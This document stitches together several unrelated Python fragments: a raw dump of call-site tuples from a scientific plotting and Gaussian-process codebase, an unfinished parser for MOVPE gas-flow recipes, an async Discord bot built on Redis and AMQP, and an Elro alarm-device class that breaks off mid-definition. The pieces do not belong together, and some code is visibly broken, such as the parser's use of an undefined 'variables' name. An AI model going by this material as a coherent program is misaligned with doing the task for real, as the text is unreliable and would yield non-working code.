((25140, 25165), 'sklearn.gaussian_process.kernels.ConstantKernel', 'ConstantKernel', (['(std2 ** 2)'], {}), '(std2 ** 2)\n', (25154, 25165), False, 'from sklearn.gaussian_process.kernels import RBF, ConstantKernel, Kernel\n'), ((25168, 25176), 'sklearn.gaussian_process.kernels.RBF', 'RBF', (['ls1'], {}), '(ls1)\n', (25171, 25176), False, 'from sklearn.gaussian_process.kernels import RBF, ConstantKernel, Kernel\n'), ((26593, 26618), 'sklearn.gaussian_process.kernels.ConstantKernel', 'ConstantKernel', (['(std2 ** 2)'], {}), '(std2 ** 2)\n', (26607, 26618), False, 'from sklearn.gaussian_process.kernels import RBF, ConstantKernel, Kernel\n'), ((26621, 26629), 'sklearn.gaussian_process.kernels.RBF', 'RBF', (['ls2'], {}), '(ls2)\n', (26624, 26629), False, 'from sklearn.gaussian_process.kernels import RBF, ConstantKernel, Kernel\n'), ((26653, 26678), 'sklearn.gaussian_process.kernels.ConstantKernel', 'ConstantKernel', (['(std2 ** 2)'], {}), '(std2 ** 2)\n', (26667, 26678), False, 'from sklearn.gaussian_process.kernels import RBF, ConstantKernel, Kernel\n'), ((26681, 26689), 'sklearn.gaussian_process.kernels.RBF', 'RBF', (['ls1'], {}), '(ls1)\n', (26684, 26689), False, 'from sklearn.gaussian_process.kernels import RBF, ConstantKernel, Kernel\n'), ((31321, 31371), 'gsum.coefficients', 'gm.coefficients', (['y2', 'ratio_vals', 'ref2_vals', 'orders'], {}), '(y2, ratio_vals, ref2_vals, orders)\n', (31336, 31371), True, 'import gsum as gm\n'), ((31389, 31444), 'gsum.coefficients', 'gm.coefficients', (['(y3 - y2)', 'ratio_vals', 'ref3_vals', 'orders'], {}), '(y3 - y2, ratio_vals, ref3_vals, orders)\n', (31404, 31444), True, 'import gsum as gm\n'), ((32427, 32447), 'numpy.array', 'np.array', (['orders_all'], {}), '(orders_all)\n', (32435, 32447), True, 'import numpy as np\n'), ((32521, 32570), 'gsum.partials', 'gm.partials', (['c', 'ratio_vals', 'ref2_vals', 'orders_all'], {}), '(c, ratio_vals, ref2_vals, orders_all)\n', (32532, 32570), True, 'import gsum as gm\n'), ((34655, 34692), 'numpy.ones_like', 'np.ones_like', (['self.orders'], {'dtype': 'bool'}), '(self.orders, dtype=bool)\n', (34667, 34692), True, 'import numpy as np\n'), ((34939, 34971), 'numpy.ones_like', 'np.ones_like', (['orders'], {'dtype': 'bool'}), '(orders, dtype=bool)\n', (34951, 34971), True, 'import numpy as np\n'), ((38400, 38418), 'matplotlib.pyplot.get_cmap', 'plt.get_cmap', (['name'], {}), '(name)\n', (38412, 38418), True, 'import matplotlib.pyplot as plt\n'), ((43449, 43484), 'numpy.linspace', 'np.linspace', (['ls_min', 'ls_max', 'ls_num'], {}), '(ls_min, ls_max, ls_num)\n', (43460, 43484), True, 'import numpy as np\n'), ((44634, 44661), 'gsum.cartesian', 'gm.cartesian', (['ls', 'breakdown'], {}), '(ls, breakdown)\n', (44646, 44661), True, 'import gsum as gm\n'), ((44685, 44755), 'pandas.DataFrame', 'pd.DataFrame', (['X'], {'columns': "['$\\\\ell$ [fm$^{-1}$]', '$\\\\Lambda_b$ [MeV]']"}), "(X, columns=['$\\\\ell$ [fm$^{-1}$]', '$\\\\Lambda_b$ [MeV]'])\n", (44697, 44755), True, 'import pandas as pd\n'), ((45068, 45088), 'numpy.argmax', 'np.argmax', (['joint_pdf'], {}), '(joint_pdf)\n', (45077, 45088), True, 'import numpy as np\n'), ((45111, 45153), 'numpy.unravel_index', 'np.unravel_index', (['map_idx', 'joint_pdf.shape'], {}), '(map_idx, joint_pdf.shape)\n', (45127, 45153), True, 'import numpy as np\n'), ((45424, 45460), 'pandas.concat', 'pd.concat', (['dfs_ls'], {'ignore_index': '(True)'}), '(dfs_ls, ignore_index=True)\n', (45433, 45460), True, 'import pandas as pd\n'), ((48679, 48712), 'numpy.argwhere', 'np.argwhere', (['(self.orders == order)'], {}), '(self.orders == order)\n', (48690, 48712), True, 'import numpy as np\n'), ((49835, 49863), 'numpy.argwhere', 'np.argwhere', (['(orders == order)'], {}), '(orders == order)\n', (49846, 49863), True, 'import numpy as np\n'), ((50805, 50829), 'numpy.atleast_1d', 'np.atleast_1d', (['ref2_vals'], {}), '(ref2_vals)\n', (50818, 50829), True, 'import numpy as np\n'), ((50854, 50878), 'numpy.atleast_1d', 'np.atleast_1d', (['ref3_vals'], {}), '(ref3_vals)\n', (50867, 50878), True, 'import numpy as np\n'), ((58300, 58328), 'numpy.sqrt', 'np.sqrt', (['model.cbar_sq_mean_'], {}), '(model.cbar_sq_mean_)\n', (58307, 58328), True, 'import numpy as np\n'), ((58751, 58783), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(3.4, 3.4)'}), '(figsize=(3.4, 3.4))\n', (58763, 58783), True, 'import matplotlib.pyplot as plt\n'), ((59141, 59181), 'gsum.ConjugateGaussianProcess', 'gm.ConjugateGaussianProcess', ([], {}), '(**gp_kwargs)\n', (59168, 59181), True, 'import gsum as gm\n'), ((59805, 59833), 'numpy.sqrt', 'np.sqrt', (['model.cbar_sq_mean_'], {}), '(model.cbar_sq_mean_)\n', (59812, 59833), True, 'import numpy as np\n'), ((62444, 62453), 'matplotlib.pyplot.gcf', 'plt.gcf', ([], {}), '()\n', (62451, 62453), True, 'import matplotlib.pyplot as plt\n'), ((63400, 63417), 'numpy.atleast_2d', 'np.atleast_2d', (['ax'], {}), '(ax)\n', (63413, 63417), True, 'import numpy as np\n'), ((69116, 69125), 'matplotlib.pyplot.gcf', 'plt.gcf', ([], {}), '()\n', (69123, 69125), True, 'import matplotlib.pyplot as plt\n'), ((69677, 69686), 'matplotlib.pyplot.gcf', 'plt.gcf', ([], {}), '()\n', (69684, 69686), True, 'import matplotlib.pyplot as plt\n'), ((71601, 71631), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(1, 3.2)'}), '(figsize=(1, 3.2))\n', (71613, 71631), True, 'import matplotlib.pyplot as plt\n'), ((71993, 72018), 'matplotlib.ticker.MaxNLocator', 'MaxNLocator', ([], {'integer': '(True)'}), '(integer=True)\n', (72004, 72018), False, 'from matplotlib.ticker import MultipleLocator, AutoMinorLocator, MaxNLocator\n'), ((72395, 72408), 'numpy.ceil', 'np.ceil', (['ymax'], {}), '(ymax)\n', (72402, 72408), True, 'import numpy as np\n'), ((72514, 72523), 'matplotlib.pyplot.gcf', 'plt.gcf', ([], {}), '()\n', (72521, 72523), True, 'import matplotlib.pyplot as plt\n'), ((73620, 73652), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(3.2, 3.2)'}), '(figsize=(3.2, 3.2))\n', (73632, 73652), True, 'import matplotlib.pyplot as plt\n'), ((74001, 74066), 'matplotlib.pyplot.rc_context', 'plt.rc_context', (["{'text.usetex': True, 'text.latex.preview': True}"], {}), "({'text.usetex': True, 'text.latex.preview': True})\n", (74015, 74066), True, 'import matplotlib.pyplot as plt\n'), ((74662, 74671), 'matplotlib.pyplot.gcf', 'plt.gcf', ([], {}), '()\n', (74669, 74671), True, 'import matplotlib.pyplot as plt\n'), ((75962, 76015), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(7, 3.2)', 'constrained_layout': '(True)'}), '(figsize=(7, 3.2), constrained_layout=True)\n', (75972, 76015), True, 'import matplotlib.pyplot as plt\n'), ((77673, 77705), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(3.2, 3.2)'}), '(figsize=(3.2, 3.2))\n', (77685, 77705), True, 'import matplotlib.pyplot as plt\n'), ((78854, 78864), 'numpy.diff', 'np.diff', (['y'], {}), '(y)\n', (78861, 78864), True, 'import numpy as np\n'), ((81821, 81830), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (81828, 81830), True, 'import matplotlib.pyplot as plt\n'), ((82338, 82380), 'numpy.argwhere', 'np.argwhere', (['(self.orders_original == order)'], {}), '(self.orders_original == order)\n', (82349, 82380), True, 'import numpy as np\n'), ((83052, 83064), 'numpy.diag', 'np.diag', (['cov'], {}), '(cov)\n', (83059, 83064), True, 'import numpy as np\n'), ((83470, 83484), 'numpy.mean', 'np.mean', (['x_min'], {}), '(x_min)\n', (83477, 83484), True, 'import numpy as np\n'), ((83493, 83506), 'numpy.std', 'np.std', (['x_min'], {}), '(x_min)\n', (83499, 83506), True, 'import numpy as np\n'), ((83528, 83542), 'numpy.mean', 'np.mean', (['y_min'], {}), '(y_min)\n', (83535, 83542), True, 'import numpy as np\n'), ((83551, 83564), 'numpy.std', 'np.std', (['y_min'], {}), '(y_min)\n', (83557, 83564), True, 'import numpy as np\n'), ((83659, 83679), 'numpy.cov', 'np.cov', (['x_min', 'y_min'], {}), '(x_min, y_min)\n', (83665, 83679), True, 'import numpy as np\n'), ((86343, 86352), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (86350, 86352), True, 'import matplotlib.pyplot as plt\n'), ((88756, 88790), 'numpy.zeros', 'np.zeros', (['(nx, ny, 1)'], {'dtype': 'float'}), '((nx, ny, 1), dtype=float)\n', (88764, 88790), True, 'import numpy as np\n'), ((11900, 11916), 'numpy.max', 'np.max', (['pdf_vals'], {}), '(pdf_vals)\n', (11906, 11916), True, 'import numpy as np\n'), ((22394, 22406), 'numpy.array', 'np.array', (['[]'], {}), '([])\n', (22402, 22406), True, 'import numpy as np\n'), ((32388, 32399), 'numpy.array', 'np.array', (['c'], {}), '(c)\n', (32396, 32399), True, 'import numpy as np\n'), ((34736, 34766), 'numpy.isin', 'np.isin', (['self.orders', 'excluded'], {}), '(self.orders, excluded)\n', (34743, 34766), True, 'import numpy as np\n'), ((35024, 35049), 'numpy.isin', 'np.isin', (['orders', 'excluded'], {}), '(orders, excluded)\n', (35031, 35049), True, 'import numpy as np\n'), ((56299, 56309), 'matplotlib.pyplot.draw', 'plt.draw', ([], {}), '()\n', (56307, 56309), True, 'import matplotlib.pyplot as plt\n'), ((59311, 59339), 'numpy.sqrt', 'np.sqrt', (['model.cbar_sq_mean_'], {}), '(model.cbar_sq_mean_)\n', (59318, 59339), True, 'import numpy as np\n'), ((59399, 59439), 'gsum.ConjugateGaussianProcess', 'gm.ConjugateGaussianProcess', ([], {}), '(**gp_kwargs)\n', (59426, 59439), True, 'import gsum as gm\n'), ((62663, 62696), 'os.path.relpath', 'path.relpath', (['name', 'self.fig_path'], {}), '(name, self.fig_path)\n', (62675, 62696), False, 'from os import path\n'), ((63184, 63248), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(2)', '(2)'], {'figsize': '(3.4, 3.4)', 'sharex': '(True)', 'sharey': '(True)'}), '(2, 2, figsize=(3.4, 3.4), sharex=True, sharey=True)\n', (63196, 63248), True, 'import matplotlib.pyplot as plt\n'), ((63293, 63325), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(3.4, 3.4)'}), '(figsize=(3.4, 3.4))\n', (63305, 63325), True, 'import matplotlib.pyplot as plt\n'), ((63349, 63366), 'numpy.atleast_2d', 'np.atleast_2d', (['ax'], {}), '(ax)\n', (63362, 63366), True, 'import numpy as np\n'), ((68059, 68079), 'matplotlib.ticker.MultipleLocator', 'MultipleLocator', (['(0.2)'], {}), '(0.2)\n', (68074, 68079), False, 'from matplotlib.ticker import MultipleLocator, AutoMinorLocator, MaxNLocator\n'), ((69902, 69935), 'os.path.relpath', 'path.relpath', (['name', 'self.fig_path'], {}), '(name, self.fig_path)\n', (69914, 69935), False, 'from os import path\n'), ((70716, 70749), 'os.path.relpath', 'path.relpath', (['name', 'self.fig_path'], {}), '(name, self.fig_path)\n', (70728, 70749), False, 'from os import path\n'), ((72744, 72777), 'os.path.relpath', 'path.relpath', (['name', 'self.fig_path'], {}), '(name, self.fig_path)\n', (72756, 72777), False, 'from os import path\n'), ((77319, 77352), 'os.path.relpath', 'path.relpath', (['name', 'self.fig_path'], {}), '(name, self.fig_path)\n', (77331, 77352), False, 'from os import path\n'), ((83911, 83941), 'numpy.column_stack', 'np.column_stack', (['(x_all, pred)'], {}), '((x_all, pred))\n', (83926, 83941), True, 'import numpy as np\n'), ((83955, 83996), 'numpy.column_stack', 'np.column_stack', (['(x_all, pred + 2 * stdv)'], {}), '((x_all, pred + 2 * stdv))\n', (83970, 83996), True, 'import numpy as np\n'), ((84010, 84051), 'numpy.column_stack', 'np.column_stack', (['(x_all, pred - 2 * stdv)'], {}), '((x_all, pred - 2 * stdv))\n', (84025, 84051), True, 'import numpy as np\n'), ((86709, 86751), 'numpy.argwhere', 'np.argwhere', (['(self.orders_original == order)'], {}), '(self.orders_original == order)\n', (86720, 86751), True, 'import numpy as np\n'), ((6419, 6465), 'joblib.Parallel', 'Parallel', ([], {'n_jobs': 'num_cores', 'prefer': '"""processes"""'}), "(n_jobs=num_cores, prefer='processes')\n", (6427, 6465), False, 'from joblib import Parallel, delayed\n'), ((22883, 22902), 'numpy.around', 'np.around', (['fweights'], {}), '(fweights)\n', (22892, 22902), True, 'import numpy as np\n'), ((43895, 43931), 'numpy.array', 'np.array', (['[breakdown, breakdown_pdf]'], {}), '([breakdown, breakdown_pdf])\n', (43903, 43931), True, 'import numpy as np\n'), ((51343, 51363), 'numpy.eye', 'np.eye', (['cov.shape[0]'], {}), '(cov.shape[0])\n', (51349, 51363), True, 'import numpy as np\n'), ((55321, 55341), 'matplotlib.ticker.MultipleLocator', 'MultipleLocator', (['(0.1)'], {}), '(0.1)\n', (55336, 55341), False, 'from matplotlib.ticker import MultipleLocator, AutoMinorLocator, MaxNLocator\n'), ((55386, 55405), 'matplotlib.ticker.AutoMinorLocator', 'AutoMinorLocator', (['(2)'], {}), '(2)\n', (55402, 55405), False, 'from matplotlib.ticker import MultipleLocator, AutoMinorLocator, MaxNLocator\n'), ((56196, 56217), 'matplotlib.ticker.MultipleLocator', 'MultipleLocator', (['(0.02)'], {}), '(0.02)\n', (56211, 56217), False, 'from matplotlib.ticker import MultipleLocator, AutoMinorLocator, MaxNLocator\n'), ((56262, 56281), 'matplotlib.ticker.AutoMinorLocator', 'AutoMinorLocator', (['(2)'], {}), '(2)\n', (56278, 56281), False, 'from matplotlib.ticker import MultipleLocator, AutoMinorLocator, MaxNLocator\n'), ((57612, 57622), 'numpy.ones', 'np.ones', (['(2)'], {}), '(2)\n', (57619, 57622), True, 'import numpy as np\n'), ((68757, 68776), 'matplotlib.ticker.AutoMinorLocator', 'AutoMinorLocator', (['(2)'], {}), '(2)\n', (68773, 68776), False, 'from matplotlib.ticker import MultipleLocator, AutoMinorLocator, MaxNLocator\n'), ((68821, 68840), 'matplotlib.ticker.AutoMinorLocator', 'AutoMinorLocator', (['(2)'], {}), '(2)\n', (68837, 68840), False, 'from matplotlib.ticker import MultipleLocator, AutoMinorLocator, MaxNLocator\n'), ((72374, 72388), 'numpy.floor', 'np.floor', (['ymin'], {}), '(ymin)\n', (72382, 72388), True, 'import numpy as np\n'), ((75010, 75043), 'os.path.relpath', 'path.relpath', (['name', 'self.fig_path'], {}), '(name, self.fig_path)\n', (75022, 75043), False, 'from os import path\n'), ((79218, 79238), 'numpy.zeros', 'np.zeros', (['X.shape[0]'], {}), '(X.shape[0])\n', (79226, 79238), True, 'import numpy as np\n'), ((83601, 83615), 'numpy.mean', 'np.mean', (['x_min'], {}), '(x_min)\n', (83608, 83615), True, 'import numpy as np\n'), ((83617, 83631), 'numpy.mean', 'np.mean', (['y_min'], {}), '(y_min)\n', (83624, 83631), True, 'import numpy as np\n'), ((88462, 88473), 'numpy.ones', 'np.ones', (['ix'], {}), '(ix)\n', (88469, 88473), True, 'import numpy as np\n'), ((88487, 88498), 'numpy.ones', 'np.ones', (['ix'], {}), '(ix)\n', (88494, 88498), True, 'import numpy as np\n'), ((88546, 88557), 'numpy.ones', 'np.ones', (['iy'], {}), '(iy)\n', (88553, 88557), True, 'import numpy as np\n'), ((88571, 88582), 'numpy.ones', 'np.ones', (['iy'], {}), '(iy)\n', (88578, 88582), True, 'import numpy as np\n'), ((7730, 7751), 'numpy.exp', 'np.exp', (['(-0.5 * r ** 2)'], {}), '(-0.5 * r ** 2)\n', (7736, 7751), True, 'import numpy as np\n'), ((44308, 44330), 'numpy.array', 'np.array', (['[ls, ls_pdf]'], {}), '([ls, ls_pdf])\n', (44316, 44330), True, 'import numpy as np\n'), ((66611, 66643), 'numpy.sqrt', 'np.sqrt', (['(std ** 2 + std_3bf ** 2)'], {}), '(std ** 2 + std_3bf ** 2)\n', (66618, 66643), True, 'import numpy as np\n'), ((68601, 68621), 'matplotlib.ticker.MultipleLocator', 'MultipleLocator', (['(0.1)'], {}), '(0.1)\n', (68616, 68621), False, 'from matplotlib.ticker import MultipleLocator, AutoMinorLocator, MaxNLocator\n'), ((68692, 68712), 'matplotlib.ticker.MultipleLocator', 'MultipleLocator', (['(0.2)'], {}), '(0.2)\n', (68707, 68712), False, 'from matplotlib.ticker import MultipleLocator, AutoMinorLocator, MaxNLocator\n'), ((6479, 6517), 'joblib.delayed', 'delayed', (['model.log_marginal_likelihood'], {}), '(model.log_marginal_likelihood)\n', (6486, 6517), False, 'from joblib import Parallel, delayed\n'), ((7757, 7778), 'numpy.arange', 'np.arange', (['(9)', '(0)', '(-0.5)'], {}), '(9, 0, -0.5)\n', (7766, 7778), True, 'import numpy as np\n'), ((6525, 6536), 'numpy.log', 'np.log', (['ls_'], {}), '(ls_)\n', (6531, 6536), True, 'import numpy as np\n')] |
#!/usr/bin/python3
#-*- coding: utf-8 -*-
"""
A simplistic attempt to parse simple procedural languages that control e.g. MOVPE apparatuses gas flow (not finished)
"""
import sys,re
time = 0
labels = {}
tableheader = [] ## TODO TODO efficient accumulation of data w/ possibility of new variables in the middle of EPI recipe
tablevalues = []
tabletiming = []
with open(sys.argv[1], encoding='latin1') as epifile:
lines = epifile.readlines()
for n, line in enumerate(lines):
#line = '1:020 " Setup: lateral growth", NH3_2.run close, TMGa_1.run close, N2.line close, N2.run open,'
## Detect and remember labels
if len(line.strip())>=1 and line.strip()[-1] == '{':
labels[line.strip()] = n
continue
timematch = re.match('^\\s*\\d?\\d?:?\\d+', line)
timedelim = timematch.end() if timematch else 0
namematch = re.search('"[^"]*"', line)
namedelim = namematch.end() if namematch else timedelim
cmntmatch = re.search('#', line)
cmntdelim = cmntmatch.end()-1 if cmntmatch else 1000000
timestr, namestr, cmdsstr = line[:timedelim].strip(), line[timedelim:namedelim].strip(), line[namedelim:cmntdelim].strip()
print("DEBUG: timestr, = ", timestr,)
print("DEBUG: namestr, = ", namestr,)
print("DEBUG: cmdsstr = ", cmdsstr)
for cmd in [c.strip().strip(';') for c in cmdsstr.split(',') if c.strip()!='']:
print(time, " DEBUG: cmd = ", cmd)
if ' to ' in cmd:
variable, value = [c.strip() for c in cmd.split(' to ', 1)]
variables[variable]
## TODO if cmd == "GOTO OR WHATEVER": n = labels[JUMPTO]; continue
## Advance the time
if timematch:
if ':' in timestr: time += 60*int(timestr.split(':')[0]) + int(timestr.split(':')[1])
else: time += int(timestr);
| [
"re.match",
"re.search"
] | [((798, 835), 're.match', 're.match', (['"""^\\\\s*\\\\d?\\\\d?:?\\\\d+"""', 'line'], {}), "('^\\\\s*\\\\d?\\\\d?:?\\\\d+', line)\n", (806, 835), False, 'import sys, re\n'), ((925, 951), 're.search', 're.search', (['""""[^"]*\\""""', 'line'], {}), '(\'"[^"]*"\', line)\n', (934, 951), False, 'import sys, re\n'), ((1048, 1068), 're.search', 're.search', (['"""#"""', 'line'], {}), "('#', line)\n", (1057, 1068), False, 'import sys, re\n')] |
import aio_pika
import asyncio
import config
import inspect
import logging
import orjson
import sys
import traceback
import zangy
from classes.misc import Status, Session
from classes.state import State
from discord import utils
from discord.ext import commands
from discord.ext.commands import DefaultHelpCommand, Context
from discord.ext.commands.core import _CaseInsensitiveDict
from discord.ext.commands.view import StringView
from discord.gateway import DiscordWebSocket
from discord.http import HTTPClient
from discord.utils import parse_time, to_json
log = logging.getLogger(__name__)
class Bot(commands.AutoShardedBot):
def __init__(self, command_prefix, help_command=DefaultHelpCommand(), description=None, **kwargs):
self.command_prefix = command_prefix
self.extra_events = {}
self._BotBase__cogs = {}
self._BotBase__extensions = {}
self._checks = []
self._check_once = []
self._before_invoke = None
self._after_invoke = None
self._help_command = None
self.description = inspect.cleandoc(description) if description else ""
self.owner_id = kwargs.get("owner_id")
self.owner_ids = kwargs.get("owner_ids", set())
self._skip_check = lambda x, y: x == y
self.help_command = help_command
self.case_insensitive = kwargs.get("case_insensitive", False)
self.all_commands = _CaseInsensitiveDict() if self.case_insensitive else {}
self.ws = None
self.loop = asyncio.get_event_loop()
self.http = HTTPClient(None, loop=self.loop)
self._handlers = {"ready": self._handle_ready}
self._hooks = {}
self._listeners = {}
self._connection = None
self._closed = False
self._ready = asyncio.Event()
self._redis = None
self._amqp = None
self._amqp_channel = None
self._amqp_queue = None
@property
def config(self):
return config
async def user(self):
return await self._connection.user()
async def users(self):
return await self._connection._users()
async def guilds(self):
return await self._connection.guilds()
async def emojis(self):
return await self._connection.emojis()
async def cached_messages(self):
return await self._connection._messages()
async def private_channels(self):
return await self._connection.private_channels()
async def shard_count(self):
return int(await self._redis.get("gateway_shards"))
async def started(self):
return parse_time(str(await self._connection._get("gateway_started").split(".")[0]))
async def statuses(self):
return [Status(x) for x in await self._connection._get("gateway_statuses")]
async def sessions(self):
return {int(x): Session(y) for x, y in (await self._connection._get("gateway_sessions")).items()}
async def get_channel(self, channel_id):
return await self._connection.get_channel(channel_id)
async def get_guild(self, guild_id):
return await self._connection._get_guild(guild_id)
async def get_user(self, user_id):
return await self._connection.get_user(user_id)
async def get_emoji(self, emoji_id):
return await self._connection.get_emoji(emoji_id)
async def get_all_channels(self):
for guild in await self.guilds():
for channel in await guild.channels():
yield channel
async def get_all_members(self):
for guild in await self.guilds():
for member in await guild.members():
yield member
async def _get_state(self, **options):
return State(
dispatch=self.dispatch,
handlers=self._handlers,
hooks=self._hooks,
http=self.http,
loop=self.loop,
redis=self._redis,
shard_count=await self.shard_count(),
**options,
)
async def get_context(self, message, *, cls=Context):
view = StringView(message.content)
ctx = cls(prefix=None, view=view, bot=self, message=message)
if self._skip_check((await message.author()).id, (await self.user()).id):
return ctx
prefix = await self.get_prefix(message)
invoked_prefix = prefix
if isinstance(prefix, str):
if not view.skip_string(prefix):
return ctx
else:
try:
if message.content.startswith(tuple(prefix)):
invoked_prefix = utils.find(view.skip_string, prefix)
else:
return ctx
except TypeError:
if not isinstance(prefix, list):
raise TypeError("get_prefix must return either a string or a list of string, "
"not {}".format(prefix.__class__.__name__))
for value in prefix:
if not isinstance(value, str):
raise TypeError("Iterable command_prefix or list returned from get_prefix must "
"contain only strings, not {}".format(value.__class__.__name__))
raise
invoker = view.get_word()
ctx.invoked_with = invoker
ctx.prefix = invoked_prefix
ctx.command = self.all_commands.get(invoker)
return ctx
async def process_commands(self, message):
if (await message.author()).bot:
return
ctx = await self.get_context(message)
await self.invoke(ctx)
async def receive_message(self, msg):
self.ws._dispatch("socket_raw_receive", msg)
msg = orjson.loads(msg)
self.ws._dispatch("socket_response", msg)
op = msg.get("op")
data = msg.get("d")
event = msg.get("t")
old = msg.get("old")
if op != self.ws.DISPATCH:
return
try:
func = self.ws._discord_parsers[event]
except KeyError:
log.debug("Unknown event %s.", event)
else:
try:
await func(data, old)
except asyncio.CancelledError:
pass
except Exception:
try:
await self.on_error(event)
except asyncio.CancelledError:
pass
removed = []
for index, entry in enumerate(self.ws._dispatch_listeners):
if entry.event != event:
continue
future = entry.future
if future.cancelled():
removed.append(index)
continue
try:
valid = entry.predicate(data)
except Exception as exc:
future.set_exception(exc)
removed.append(index)
else:
if valid:
ret = data if entry.result is None else entry.result(data)
future.set_result(ret)
removed.append(index)
for index in reversed(removed):
del self.ws._dispatch_listeners[index]
async def send_message(self, msg):
data = to_json(msg)
self.ws._dispatch("socket_raw_send", data)
await self._amqp_channel.default_exchange.publish(aio_pika.Message(body=data), routing_key="gateway.send")
async def start(self):
log.info("Starting...")
self._redis = await zangy.create_pool(self.config.redis_url, 5)
self._amqp = await aio_pika.connect_robust(self.config.amqp_url)
self._amqp_channel = await self._amqp.channel()
self._amqp_queue = await self._amqp_channel.get_queue("gateway.recv")
self._connection = await self._get_state()
self._connection._get_client = lambda: self
self.ws = DiscordWebSocket(socket=None, loop=self.loop)
self.ws.token = self.http.token
self.ws._connection = self._connection
self.ws._discord_parsers = self._connection.parsers
self.ws._dispatch = self.dispatch
self.ws.call_hooks = self._connection.call_hooks
await self.http.static_login(self.config.token, bot=True)
for extension in self.config.cogs:
try:
self.load_extension("cogs." + extension)
except Exception:
log.error(f"Failed to load extension {extension}.", file=sys.stderr)
log.error(traceback.print_exc())
async with self._amqp_queue.iterator() as queue_iter:
async for message in queue_iter:
async with message.process(ignore_processed=True):
await self.receive_message(message.body)
message.ack()
| [
"logging.getLogger",
"discord.ext.commands.view.StringView",
"aio_pika.connect_robust",
"discord.utils.to_json",
"discord.ext.commands.DefaultHelpCommand",
"classes.misc.Status",
"discord.utils.find",
"discord.gateway.DiscordWebSocket",
"discord.http.HTTPClient",
"asyncio.Event",
"inspect.cleand... | [((566, 593), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (583, 593), False, 'import logging\n'), ((684, 704), 'discord.ext.commands.DefaultHelpCommand', 'DefaultHelpCommand', ([], {}), '()\n', (702, 704), False, 'from discord.ext.commands import DefaultHelpCommand, Context\n'), ((1511, 1535), 'asyncio.get_event_loop', 'asyncio.get_event_loop', ([], {}), '()\n', (1533, 1535), False, 'import asyncio\n'), ((1556, 1588), 'discord.http.HTTPClient', 'HTTPClient', (['None'], {'loop': 'self.loop'}), '(None, loop=self.loop)\n', (1566, 1588), False, 'from discord.http import HTTPClient\n'), ((1783, 1798), 'asyncio.Event', 'asyncio.Event', ([], {}), '()\n', (1796, 1798), False, 'import asyncio\n'), ((4069, 4096), 'discord.ext.commands.view.StringView', 'StringView', (['message.content'], {}), '(message.content)\n', (4079, 4096), False, 'from discord.ext.commands.view import StringView\n'), ((5738, 5755), 'orjson.loads', 'orjson.loads', (['msg'], {}), '(msg)\n', (5750, 5755), False, 'import orjson\n'), ((7240, 7252), 'discord.utils.to_json', 'to_json', (['msg'], {}), '(msg)\n', (7247, 7252), False, 'from discord.utils import parse_time, to_json\n'), ((7882, 7927), 'discord.gateway.DiscordWebSocket', 'DiscordWebSocket', ([], {'socket': 'None', 'loop': 'self.loop'}), '(socket=None, loop=self.loop)\n', (7898, 7927), False, 'from discord.gateway import DiscordWebSocket\n'), ((1069, 1098), 'inspect.cleandoc', 'inspect.cleandoc', (['description'], {}), '(description)\n', (1085, 1098), False, 'import inspect\n'), ((1411, 1433), 'discord.ext.commands.core._CaseInsensitiveDict', '_CaseInsensitiveDict', ([], {}), '()\n', (1431, 1433), False, 'from discord.ext.commands.core import _CaseInsensitiveDict\n'), ((2725, 2734), 'classes.misc.Status', 'Status', (['x'], {}), '(x)\n', (2731, 2734), False, 'from classes.misc import Status, Session\n'), ((2848, 2858), 'classes.misc.Session', 'Session', (['y'], {}), '(y)\n', (2855, 2858), False, 'from classes.misc import Status, Session\n'), ((7508, 7551), 'zangy.create_pool', 'zangy.create_pool', (['self.config.redis_url', '(5)'], {}), '(self.config.redis_url, 5)\n', (7525, 7551), False, 'import zangy\n'), ((7579, 7624), 'aio_pika.connect_robust', 'aio_pika.connect_robust', (['self.config.amqp_url'], {}), '(self.config.amqp_url)\n', (7602, 7624), False, 'import aio_pika\n'), ((7362, 7389), 'aio_pika.Message', 'aio_pika.Message', ([], {'body': 'data'}), '(body=data)\n', (7378, 7389), False, 'import aio_pika\n'), ((4592, 4628), 'discord.utils.find', 'utils.find', (['view.skip_string', 'prefix'], {}), '(view.skip_string, prefix)\n', (4602, 4628), False, 'from discord import utils\n'), ((8500, 8521), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (8519, 8521), False, 'import traceback\n')] |
from enum import Enum
from abc import ABC, abstractmethod
import logging
import json
import trio
class DeviceType(Enum):
"""
The DeviceType defines which kind of Elro device this is
"""
CO_ALARM = "0000"
WATER_ALARM = "0004"
HEAT_ALARM = "0003"
FIRE_ALARM = "0005"
DOOR_WINDOW_SENSOR = "0101"
class Device(ABC):
"""
A Device is an Elro device that is connected to the system
"""
def __init__(self, device_id, device_type):
"""
Constructor
:param device_id: The device ID
:param device_type: The device type
"""
self.id = device_id
self._name = ""
self._battery_level = -1
self._device_state = ""
self.device_type = device_type
self.updated = trio.Event()
self.alarm = trio.Event()
@property
def name(self):
"""
The name of the device
:return: The name
"""
return self._name
@name.setter
def name(self, name):
self._name = name
self._send_update_event()
@property
def device_state(self):
"""
The current state of the device as a string
:return: The device state
"""
return self._device_state
@device_state.setter
def device_state(self, device_state):
self._device_state = device_state
self._send_update_event()
@property
def battery_level(self):
"""
The current battery level of the device in percent.
:return: The battery level
"""
return self._battery_level
@battery_level.setter
def battery_level(self, battery_level):
self._battery_level = battery_level
self._send_update_event()
def _send_update_event(self):
"""
Triggers the self.updated event
"""
self.updated.set()
self.updated = trio.Event()
def send_alarm_event(self):
"""
Triggers the self.alarm event.
"""
self.alarm.set()
self.alarm = trio.Event()
def update(self, data):
"""
Updates this device with the data received from the actual device
:param data: The data dict received from the actual device
"""
self.device_type = data["data"]["device_name"]
# set battery status
batt = int(data["data"]["device_status"][2:4], 16)
self.battery_level = batt
self.device_state = "Unknown"
self.update_specifics(data)
self._send_update_event()
@abstractmethod
def update_specifics(self, data):
"""
An abstract method that is called to update type specific things.
:param data: The data dict received from the actual device
"""
pass
def __str__(self):
return f"<{self.device_type}: {self.name} (id: {self.id})>"
def __repr__(self):
return str(self)
@property
